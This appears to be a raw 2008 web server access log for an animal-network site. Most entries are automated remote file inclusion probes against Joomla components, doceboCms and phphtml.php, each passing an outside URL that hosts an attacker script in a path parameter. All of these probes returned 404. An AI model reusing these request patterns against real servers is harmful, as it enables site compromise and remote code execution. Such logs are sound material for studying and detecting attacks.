58.26.163.11 - - [07/Sep/2008:05:27:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://squeaky.leesoukup.com/2008/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "theanimalnetwork.net"
58.26.163.11 - - [07/Sep/2008:05:27:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://squeaky.leesoukup.com/2008/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "theanimalnetwork.net"
201.28.77.162 - - [07/Sep/2008:05:28:49 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://cuza-voda.go.ro/b?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "theanimalnetwork.net"
201.28.77.162 - - [07/Sep/2008:05:28:49 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://cuza-voda.go.ro/b?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "theanimalnetwork.net"
201.28.77.162 - - [07/Sep/2008:05:28:49 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://cuza-voda.go.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "theanimalnetwork.net"
201.28.77.162 - - [07/Sep/2008:05:28:49 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://cuza-voda.go.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:05:30:23 -0700] "GET /logs/access_080723.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:05:30:23 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:05:30:23 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
72.29.68.220 - - [07/Sep/2008:05:31:09 -0700] "GET /logs/access_080729.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alevichat.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
66.187.101.14 - - [07/Sep/2008:05:31:44 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
66.187.101.14 - - [07/Sep/2008:05:31:44 -0700] "GET /logs/phphtml.php?htmlclass_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.47.213.57 - - [07/Sep/2008:05:32:08 -0700] "GET /phphtml.php?htmlclass_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
59.125.183.76 - - [07/Sep/2008:05:33:32 -0700] "GET /logs/access_080724.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
59.125.183.76 - - [07/Sep/2008:05:33:32 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
59.125.183.76 - - [07/Sep/2008:05:33:33 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
216.55.155.50 - - [07/Sep/2008:05:34:09 -0700] "GET /logs/access_080720.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
208.111.154.21 - - [07/Sep/2008:05:34:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "theanimalnetwork.net"
208.111.154.16 - - [07/Sep/2008:05:34:11 -0700] "GET /logs HTTP/1.1" 301 96 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "theanimalnetwork.net"
208.111.154.16 - - [07/Sep/2008:05:34:15 -0700] "GET /logs/ HTTP/1.1" 200 1796 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "theanimalnetwork.net"
216.55.155.50 - - [07/Sep/2008:05:34:24 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://indocairo.